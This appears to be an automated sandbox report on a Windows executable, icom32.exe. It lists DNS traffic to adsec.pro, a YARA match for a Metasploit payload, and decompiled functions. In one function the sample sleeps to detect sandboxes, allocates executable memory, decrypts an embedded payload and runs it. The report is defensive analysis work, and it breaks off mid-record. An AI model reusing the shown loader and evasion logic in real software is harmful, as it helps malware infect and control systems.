Apr 29, 2021 09:45:29.970298052 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:30.488544941 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:30.545706034 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:30.965362072 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:31.027667046 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:31.757571936 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:31.806217909 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:32.605614901 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:32.667706013 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:33.159276009 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:33.216245890 CEST	53	52752	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:34.498581886 CEST	60542	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:34.549938917 CEST	53	60542	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:35.695833921 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:35.760629892 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:45.860032082 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:45.911448956 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:46.114226103 CEST	50904	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:46.184962988 CEST	53	50904	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:48.779553890 CEST	57525	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:48.838181019 CEST	53	57525	8.8.8.8	192.168.2.4
Apr 29, 2021 09:46:20.465852976 CEST	53814	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:46:20.515151978 CEST	53	53814	8.8.8.8	192.168.2.4
Apr 29, 2021 09:46:22.035170078 CEST	53418	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:46:22.092725992 CEST	53	53418	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 29, 2021 09:45:17.269332886 CEST	192.168.2.4	8.8.8.8	0x63fc	Standard query (0)	adsec.pro	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 29, 2021 09:45:17.487935066 CEST	8.8.8.8	192.168.2.4	0x63fc	No error (0)	adsec.pro		163.172.159.210	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: icom32.exe PID: 7040 Parent PID: 5848

General

Start time:	09:44:45
Start date:	29/04/2021
Path:	C:\Users\user\Desktop\icom32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\icom32.exe'
Imagebase:	0x400000
File size:	62464 bytes
MD5 hash:	D1F66D78808B8CBD18804812F1A457A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: icom32.exe PID: 7040 Parent PID: 5848 icom32.exeCOMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	1.8%
Signature Coverage:	9.6%
Total number of Nodes:	561
Total number of Limit Nodes:	6

Executed Functions

Function 00401010, Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 231
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00401035
WSAGetLastError.WS2_32 ref: 0040103F
gethostbyname.WS2_32(google.com), ref: 00401065
WSACleanup.WS2_32 ref: 00401074

Strings

google.com, xrefs: 0040105F, 00401064
Date: , xrefs: 0040116B
Day:%d Mon:%d Year:%d %d:%d:%d, xrefs: 004012CF, 004012D4
==|%s|==, xrefs: 004011BB, 004011C0
Send i = %d, xrefs: 00401130, 00401135
GET drv, xrefs: 004010F5, 004010FA
[!] sock INVALID_SOCKET, xrefs: 004010BD, 004010C2
@@s, xrefs: 004010AE
WSAStart error %d, xrefs: 00401046, 0040104B
Recv i = %d, xrefs: 0040115D, 00401162
GMT, xrefs: 0040119A

Memory Dump Source

Source File: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: CleanupErrorLastStartupgethostbyname
String ID: ==|%s|==$@@s$Date: $Day:%d Mon:%d Year:%d %d:%d:%d$GET drv$GMT$Recv i = %d$Send i = %d$WSAStart error %d$[!] sock INVALID_SOCKET$google.com
API String ID: 2427713200-2930182172
Opcode ID: 87255d569cd8bed954b22e06fa1ed1c6cf954e84d4e4819b787c21827043e984
Instruction ID: 543d407db142f56f7e62288f27103ab2dc4fb170fd8529daf1628ccaf14530b5
Opcode Fuzzy Hash: 87255d569cd8bed954b22e06fa1ed1c6cf954e84d4e4819b787c21827043e984
Instruction Fuzzy Hash: 3BA1D4B4E00608AFCB10DFE9D989A9EBBB8EB08314F5045B6F514F7391D7399A418F64

Uniqueness

Uniqueness Score: -1.00%

Function 00406CE0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406CE0(signed int __eax, struct HINSTANCE__* __ebx, intOrPtr __edx, void* __eflags) {
				CHAR* _t14;
				signed int _t16;
				intOrPtr* _t28;
				short* _t30;
				short* _t36;
				intOrPtr _t39;
				short _t41;
				signed int _t47;
				signed int _t61;
				signed int _t62;
				struct HINSTANCE__* _t63;

				_t62 = __eax;
				_t63 = __ebx;
				 *0x410024 = __eax;
				 *0x40f510 = __edx;
				E00408AC0(); // executed
				_t14 = GetEnvironmentStringsA(); // executed
				 *0x40f59a = _t14;
				 *0x410648 = 0;
				_t16 = GetVersion();
				 *0x40f5a0 = _t16;
				 *0x40f5a2 = _t16 >> 0x10;
				 *0x40f5a4 = 0;
				 *0x40f5a8 = 0;
				 *0x40f5a1 = (_t16 & 0x0000ffff) >> 0x00000008 & 0x000000ff;
				_t47 =  *0x40f5a8; // 0x6
				 *0x40f5ac = 0;
				 *0x40f5b0 = _t47 << 8;
				GetModuleFileNameA(0, "C:\Users\jones\Desktop\icom32.exe", 0x104);
				 *0x40f568 = 0x410028;
				E00408BF0(0, 0x208, 0x41012c);
				 *0x40f574 = 0x41012c;
				_t28 = E00408C90(GetCommandLineA());
				_t39 =  *_t28;
				 *0x410020 = _t28;
				if(_t39 == 0x22) {
					_t28 = _t28 + 1;
					__eflags = _t39 -  *_t28;
					if(_t39 ==  *_t28) {
						L7:
						__eflags =  *_t28;
						if( *_t28 != 0) {
							_t28 = _t28 + 1;
						}
						L2:
						if(( *0x00405B01 & 0x00000002) != 0) {
							_t28 = _t28 + 1;
							goto L2;
						}
						 *0x40f564 = _t28;
						__eflags = GetCommandLineW();
						if(__eflags == 0) {
							_t30 = 0x406ca0;
							L24:
							 *0x40f570 = _t30;
							__eflags = _t62;
							if(_t62 != 0) {
								GetModuleFileNameA(_t63, 0x410334, 0x104);
								 *0x40f56c = 0x410334;
								E00408BF0(_t63, 0x208, 0x410438);
								 *0x40f578 = 0x410438;
								return 1;
							} else {
								return 1;
							}
						}
						_t36 = E00408CD0(_t29, __eflags);
						_t41 =  *_t36;
						 *0x41001c = _t36;
						__eflags = _t41 - 0x22;
						if(_t41 == 0x22) {
							_t30 = _t36 + 2;
							__eflags = _t41 -  *_t30;
							if(_t41 ==  *_t30) {
								L19:
								__eflags =  *_t30;
								if( *_t30 != 0) {
									_t30 = _t30 + 2;
								}
								while(1) {
									L14:
									__eflags =  *0x00405B01 & 0x00000002;
									if(( *0x00405B01 & 0x00000002) == 0) {
										goto L24;
									}
									_t30 = _t30 + 2;
								}
								goto L24;
							} else {
								goto L17;
							}
							while(1) {
								L17:
								__eflags =  *_t30;
								if( *_t30 == 0) {
									goto L19;
								}
								_t30 = _t30 + 2;
								__eflags =  *_t30 - 0x22;
								if( *_t30 != 0x22) {
									continue;
								}
								goto L19;
							}
							goto L19;
						} else {
							goto L13;
						}
						while(1) {
							L13:
							__eflags =  *0x00405B01 & 0x00000002;
							if(( *0x00405B01 & 0x00000002) != 0) {
								goto L14;
							}
							__eflags =  *_t36;
							if( *_t36 == 0) {
								goto L14;
							}
							_t36 = _t36 + 2;
						}
						goto L14;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						__eflags =  *_t28;
						if( *_t28 == 0) {
							goto L7;
						}
						_t28 = _t28 + 1;
						__eflags =  *_t28 - 0x22;
						if( *_t28 != 0x22) {
							continue;
						}
						goto L7;
					}
					goto L7;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t61 =  *_t28;
					if(( *0x00405B01 & 0x00000002) != 0) {
						goto L2;
					}
					__eflags = _t61;
					if(_t61 == 0) {
						goto L2;
					} else {
						_t28 = _t28 + 1;
						continue;
					}
				}
				goto L2;
			}

0x00406ce3
0x00406ce5
0x00406ce7
0x00406cec
0x00406cf2
0x00406cf7
0x00406cfd
0x00406d04
0x00406d09
0x00406d11
0x00406d1e
0x00406d37
0x00406d4c
0x00406d53
0x00406d5b
0x00406d6d
0x00406d72
0x00406d78
0x00406d85
0x00406d8f
0x00406d94
0x00406da4
0x00406dab
0x00406dad
0x00406db5
0x00406dd4
0x00406dd5
0x00406dd7
0x00406de4
0x00406de4
0x00406de7
0x00406de9
0x00406de9
0x00406dc4
0x00406dcf
0x00406dd1
0x00000000
0x00406dd1
0x00406df3
0x00406dfe
0x00406e00
0x00406e67
0x00406e6c
0x00406e6c
0x00406e71
0x00406e73
0x00406e8e
0x00406e9b
0x00406ea5
0x00406eaa
0x00406ebc
0x00406e75
0x00406e7d
0x00406e7d
0x00406e73
0x00406e06
0x00406e0d
0x00406e10
0x00406e15
0x00406e19
0x00406e3a
0x00406e3d
0x00406e40
0x00406e51
0x00406e51
0x00406e55
0x00406e57
0x00406e57
0x00406e28
0x00406e28
0x00406e2c
0x00406e33
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e42
0x00406e42
0x00406e42
0x00406e46
0x00000000
0x00000000
0x00406e48
0x00406e4b
0x00406e4f
0x00000000
0x00000000
0x00000000
0x00406e4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e1b
0x00406e1b
0x00406e1f
0x00406e26
0x00000000
0x00000000
0x00406e5c
0x00406e60
0x00000000
0x00000000
0x00406e62
0x00406e62
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dd9
0x00406dd9
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406dde
0x00406ddf
0x00406de2
0x00000000
0x00000000
0x00000000
0x00406de2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406db7
0x00406db7
0x00406db9
0x00406dc2
0x00000000
0x00000000
0x00406dec
0x00406dee
0x00000000
0x00406df0
0x00406df0
0x00000000
0x00406df0
0x00406dee
0x00000000

APIs

Part of subcall function 00408AC0: GetStdHandle.KERNEL32(000000F6,?,?,00406CF7,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408ACE
Part of subcall function 00408AC0: GetStdHandle.KERNEL32(000000F5,?,?,00406CF7,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408AEB
Part of subcall function 00408AC0: GetStdHandle.KERNEL32(000000F4,?,?,00406CF7,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408B03

GetEnvironmentStringsA.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406CF7
GetVersion.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406D09
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\icom32.exe,00000104,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406D78

Part of subcall function 00408BF0: GetVersion.KERNEL32(?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408BFA

GetCommandLineA.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406D9E
GetCommandLineW.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406DF8
GetModuleFileNameA.KERNEL32(00000000,00410334,00000104,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406E8E

Part of subcall function 00408BF0: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\icom32.exe,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108), ref: 00408C21

Strings

C:\Users\user\Desktop\icom32.exe, xrefs: 00406D7E, 00406D94
C:\Users\user\Desktop\icom32.exe, xrefs: 00406D61, 00406D85

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: FileHandleModuleName$CommandLineVersion$EnvironmentStrings
String ID: C:\Users\user\Desktop\icom32.exe$C:\Users\user\Desktop\icom32.exe
API String ID: 3182714229-1161640841
Opcode ID: e1ad09644496fb7ce1881a70044663e67e1c74f9e80c2aed997b6ff80cf03d93
Instruction ID: 1ab74da2d637754d5f1abda7a5b02a3bc60c499ea5c9c2eeb27cc7c59e59ec54
Opcode Fuzzy Hash: e1ad09644496fb7ce1881a70044663e67e1c74f9e80c2aed997b6ff80cf03d93
Instruction Fuzzy Hash: 65418F75A153419EE321AF39DD093923BA2AB46304B19807AD082EB7E2D7BC44A9C75C

Uniqueness

Uniqueness Score: -1.00%

Function 007000D7, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,00700168,00000000,00000000,00000000,84C03200,00000000,00000000,?,696E6977,0074656E), ref: 007000EB
ExitProcess.KERNEL32(56A2B5F0,?,696E6977,0074656E), ref: 007002ED

Strings

@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$, xrefs: 0070017D

Memory Dump Source

Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_icom32.jbxd

Yara matches

Similarity

API ID: ExitHttpOpenProcessRequest
String ID: @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$
API String ID: 4217525295-4015130067
Opcode ID: 8a3a5e192a520bbb4d007ee9a9ae763f2622d1b439e3a0c0fe30cccbe4347ed8
Instruction ID: 738065eef18c2d967a5217f59674689903b3903cd3a2523b50a9e7221ddd40b4
Opcode Fuzzy Hash: 8a3a5e192a520bbb4d007ee9a9ae763f2622d1b439e3a0c0fe30cccbe4347ed8
Instruction Fuzzy Hash: D2718BB6069295BEE7258E368D8EF377B9CFF93725B20421DF191860C3D5549802C2A6

Uniqueness

Uniqueness Score: -1.00%

Function 007000BA, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 203
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(C69F8957,00000000,00700331,000001BB,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 007000CF

Part of subcall function 007000D7: HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,00700168,00000000,00000000,00000000,84C03200,00000000,00000000,?,696E6977,0074656E), ref: 007000EB

ExitProcess.KERNEL32(56A2B5F0,?,696E6977,0074656E), ref: 007002ED

Strings

@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$, xrefs: 0070017D

Memory Dump Source

Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_icom32.jbxd

Yara matches

Similarity

API ID: ConnectExitHttpInternetOpenProcessRequest
String ID: @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$
API String ID: 3864964405-4015130067
Opcode ID: 58743714b21e5df703cd851a87d1fc4d967c688b5f0ba4f496d9465c8c31b24a
Instruction ID: bb1cfe32e6764618f343dc813224870c2fdbc1ea2253e9256ac350623d7b786d
Opcode Fuzzy Hash: 58743714b21e5df703cd851a87d1fc4d967c688b5f0ba4f496d9465c8c31b24a
Instruction Fuzzy Hash: 14516BBA07C2D6AEE7198F348A9E9377B9CFE23725710524DE1D2850C3D194A81383A2

Uniqueness

Uniqueness Score: -1.00%

Function 00406600, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406600(void* __eax) {
				intOrPtr _v20;
				void* _v24;
				void* _v26;
				void* _v28;
				void* _v30;
				void* _v32;
				void* _v34;
				void* _v36;
				char _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v110;
				void* _v112;
				void* _v114;
				void* _v116;
				void* _v118;
				void* _v120;
				char _v184;
				void* __ebx;
				void* __edx;
				signed char _t28;
				long _t30;
				void* _t39;
				void* _t41;
				intOrPtr _t73;
				intOrPtr _t76;
				struct _TIME_ZONE_INFORMATION* _t80;

				if(__eax != 0) {
					 *0x40f508 =  *0x40f508 & 0x000000fd;
					return 0;
				} else {
					_t28 =  *0x40f508; // 0x3
					if((_t28 & 0x00000001) == 0 || (_t28 & 0x00000002) == 0) {
						 *0x40f500 = 1;
						 *0x40f508 =  *0x40f508 | 0x00000002; // executed
						_t30 = GetTimeZoneInformation(_t80); // executed
						if(_t30 > 2) {
							 *0x40f4fc = 0x4650;
							 *0x40f504 = 0xe10;
							return 1;
						} else {
							_t76 = _v104;
							 *0x40f4fc = (_t80->Bias + _t76) * 0x3c;
							_t73 = _v20;
							 *0x40f504 = (_v20 - _t76) * 0xffffffc4;
							if(_t73 == 0) {
								 *0x40f500 = _t73;
							}
							_t39 = E00408740("W. Europe Standard Time", 0x80,  &_v184);
							if(_t39 != 0xffffffff) {
								 *((char*)(_t39 + "W. Europe Standard Time")) = 0;
							} else {
								"W. Europe Standard Time" = 0;
							}
							_t41 = E00408740("W. Europe Daylight Time", 0x80,  &_v100);
							if(_t41 != 0xffffffff) {
								 *((char*)(_t41 + "W. Europe Daylight Time")) = 0;
							} else {
								"W. Europe Daylight Time" = 0;
							}
							 *0x40f3a8 = 0;
							 *0x40f3ac = 0;
							 *0x40f3b0 = 0;
							 *0x40f3b4 = 0;
							 *0x40f3b8 = 0xffffffffffffffff;
							 *0x40f3bc = 0;
							 *0x40f3c0 = 0;
							 *0x40f3cc = 0;
							 *0x40f3d0 = 0;
							 *0x40f3d4 = 0;
							 *0x40f3d8 = 0;
							 *0x40f3dc = 0xffffffffffffffff;
							 *0x40f3c4 = 0;
							 *0x40f3c8 = 0;
							 *0x40f3e0 = 0;
							 *0x40f3e8 = 0;
							 *0x40f3ec = 0;
							 *0x40f3e4 = 0;
							goto L11;
						}
					} else {
						L11:
						return 1;
					}
				}
			}

0x0040660c
0x004067ab
0x004067be
0x00406612
0x00406612
0x0040661b
0x00406629
0x00406633
0x0040663a
0x00406643
0x004067d7
0x004067e1
0x004067fa
0x00406649
0x0040664c
0x00406655
0x00406666
0x0040666d
0x00406674
0x00406676
0x00406676
0x0040668a
0x00406692
0x004067bf
0x00406698
0x00406698
0x00406698
0x004066ad
0x004066b5
0x004067cb
0x004066bb
0x004066bb
0x004066bb
0x004066cc
0x004066db
0x004066ea
0x004066f9
0x00406709
0x00406718
0x00406727
0x00406733
0x0040673f
0x0040674b
0x00406757
0x00406766
0x0040676d
0x00406778
0x0040677e
0x00406785
0x00406790
0x00406796
0x00000000
0x00406796
0x0040679b
0x0040679b
0x004067aa
0x004067aa
0x0040661b

APIs

GetTimeZoneInformation.KERNELBASE ref: 0040663A

Strings

W. Europe Daylight Time, xrefs: 004066A8, 004066BB
W. Europe Standard Time, xrefs: 00406685, 00406698

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: InformationTimeZone
String ID: W. Europe Daylight Time$W. Europe Standard Time
API String ID: 565725191-986674615
Opcode ID: 85a8e670cbc73a0d3c6b68df26a3ccb44cc4220f7f6c9fd526d3ede61076a217
Instruction ID: c90e11ea19efc78333c6ee6619a9f6a91a5bad6b7bf520ff5c0d62c00a7e0627
Opcode Fuzzy Hash: 85a8e670cbc73a0d3c6b68df26a3ccb44cc4220f7f6c9fd526d3ede61076a217
Instruction Fuzzy Hash: 154180796183418ED320CF39EE407567BE1AB95720F11893AED98E3BA1F374844DCB1A

Uniqueness

Uniqueness Score: -1.00%

Function 004097B0, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004097B0() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00409360); // executed
				if(_t1 != 0) {
					return SetUnhandledExceptionFilter(_t1);
				} else {
					return _t1;
				}
			}

0x004097b7
0x004097bf
0x004097cd
0x004097c3
0x004097c3
0x004097c3

APIs

SetUnhandledExceptionFilter.KERNELBASE(00409360,?,?,00406F2D,?,?,?,00000108,0040739C), ref: 004097B7
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00406F2D,?,?,?,00000108,0040739C), ref: 004097C5

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: de6798b6283f7c1abeb6d1da2a164cb434f66907654042ba3109f2104da689c3
Instruction ID: 52ca0843df3dfcc92a0733aeeff1ca781e89286c72fe80894f0f93a2ef2e31bb
Opcode Fuzzy Hash: de6798b6283f7c1abeb6d1da2a164cb434f66907654042ba3109f2104da689c3
Instruction Fuzzy Hash: C1C08CF2310100EEFA084B237F4D93A2B1CD5C0B22330843FF207A40D1DB3448229439

Uniqueness

Uniqueness Score: -1.00%

Function 0040C390, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C390(void* __eflags) {
				void* _t3;
				signed int _t5;

				_t5 = GetFileType(E004089F0(_t3)); // executed
				return (_t5 & 0xffffff00 | _t5 == 0x00000002) & 0x000000ff;
			}

0x0040c398
0x0040c3ab

APIs

GetFileType.KERNELBASE(00000000,Tm,004073A1,0040A225,Tm,?,0040789A,?,004073A1,?,00405A43,?,?,?,?,004054EC), ref: 0040C398

Strings

Tm, xrefs: 0040C391

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: FileType
String ID: Tm
API String ID: 3081899298-1983248850
Opcode ID: b8a21e23f9ab715022278e78b7a81fda4b90f9d2f1d498bc3fa3a32933c5ee16
Instruction ID: 635ee0aa3c2b8f6f388d84785f478b042f7bca3d1dbbed953bf25a4394c760ce
Opcode Fuzzy Hash: b8a21e23f9ab715022278e78b7a81fda4b90f9d2f1d498bc3fa3a32933c5ee16
Instruction Fuzzy Hash: 1CB092FB16460259EA283372AE4EA3E161CEB80321B248D3EF003E44D38E3C94506039

Uniqueness

Uniqueness Score: -1.00%

Function 007000A7, Relevance: 2.8, APIs: 1, Instructions: 1313
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(A779563A,00000000,00000000,00000000,00000000,00000000,007000A7,?,696E6977,0074656E), ref: 007000B3

Part of subcall function 007000BA: InternetConnectA.WININET(C69F8957,00000000,00700331,000001BB,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 007000CF

Memory Dump Source

Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_icom32.jbxd

Yara matches

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: b03323c2e244ca8ccf8c72cf7377ca56a5f56506497ad87a6f32117f72b9f516
Instruction ID: 9dbb87f7892267452d34367f39cd9cc376fe83565b07e28a602667b9fc51fdbf
Opcode Fuzzy Hash: b03323c2e244ca8ccf8c72cf7377ca56a5f56506497ad87a6f32117f72b9f516
Instruction Fuzzy Hash: A141EF7148A386CFD3934B7098651C17BF4BE5333872941EED481CA5A3E2AE4D87CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004013E0, Relevance: 2.6, APIs: 2, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004013E0(intOrPtr __eax, intOrPtr __edx, void* __fp0) {
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* __ebx;
				void* _t27;
				long _t39;
				long _t41;

				_v48 = __eax;
				_v44 = __edx;
				_v28 = E00401010(0);
				if(_v28 >= 0) {
					Sleep(0x7530); // executed
					_v24 = E00401010(0);
					if(_v24 >= 0) {
						if(_v24 - _v28 >= 0x1c) {
							_t27 = VirtualAlloc(0,  *0x4014b0, 0x3000, 0x40); // executed
							_v36 = _t27;
							_t41 =  *0x4014b0; // 0x1961
							_v32 = E00401310(0x4014bc, _t41, __fp0);
							_t39 =  *0x4014b0; // 0x1961
							E00405840(_v36, _t39, _v32);
							E00405860(_v32);
							_v36();
							_v40 = 0;
						} else {
							E004013B0();
							_v40 = 0;
						}
					} else {
						E004013B0();
						_v40 = 0;
					}
				} else {
					E004013B0();
					_v40 = 0;
				}
				return _v40;
			}

0x004013ed
0x004013f0
0x004013fa
0x00401401
0x00401419
0x00401426
0x0040142d
0x00401446
0x00401465
0x0040146b
0x0040146e
0x0040147e
0x00401481
0x0040148d
0x00401495
0x0040149a
0x0040149d
0x00401448
0x00401448
0x0040144d
0x0040144d
0x0040142f
0x0040142f
0x00401434
0x00401434
0x00401403
0x00401403
0x00401408
0x00401408
0x004014ae

APIs

Part of subcall function 00401010: WSAStartup.WS2_32(00000202,?), ref: 00401035
Part of subcall function 00401010: WSAGetLastError.WS2_32 ref: 0040103F

Sleep.KERNELBASE(00007530,?,?,00000108,00409DA4), ref: 00401419

Part of subcall function 004013B0: MessageBoxA.USER32 ref: 004013D1

Memory Dump Source

Source File: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: ErrorLastMessageSleepStartup
String ID:
API String ID: 99729575-0
Opcode ID: 3759a16f545ec28d4a32291382bd5c52e45aa4e5ebaebd88d0e51f5404919085
